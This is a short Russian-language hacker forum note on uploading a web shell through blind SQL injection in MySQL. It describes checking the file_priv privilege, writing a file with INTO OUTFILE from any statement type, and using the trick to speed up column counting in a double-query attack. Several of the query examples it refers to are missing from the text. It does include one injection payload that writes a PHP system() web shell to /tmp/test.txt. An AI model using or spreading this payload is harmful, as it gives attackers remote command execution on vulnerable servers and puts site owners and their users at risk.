[небольшая заметка о залитии файлов в слепых инъекциях]

Посмотрев в интернете информацию по данному вопросу и ничего не найдя, решил поделиться с вами, дорогие друзья, своими мыслями...
Начнем с проверки прав, дабы убедиться, что у нас есть file_priv:
Если все ровно и нет никаких ошибок, следующим запросом льем шелл:
Можно также проверить залился ли файл, как мы проверяли наличие file_priv:
Плюс вышеописанной конструкции заключается в том, что где бы инъект не был, в операторе SELECT, UPDATE, INSERT и т.д., при присутствии file_priv и отсутствии magic_quotes, шелл будет литься.

[BONUS]
Продолжим мысль и придумаем еще одно применение данной конструкции....
Надеюсь все читали про способ заливки шелла через инъекции, даже с присутствием magic_quotes, посредством двойного запроса...
Так вот, чтобы залить шелл необходимо было ордер баем вычислять кол-во колонок, участвующих во втором(вложенном) запросе.
Использую же вышеописанную технику, можно сократить время подбора колонок(имхо, довольно существенно, потому что когда подбираешь кол-во, приходится каждый раз хексить внутренний запрос)

Хексим:
(1 and if((select "<?php system($_REQUEST[c]); ?>" into outfile '/tmp/test.txt'),1,2)=1-- )
И подставляем сие чудо на место поля, учавствующего в двойном запросе...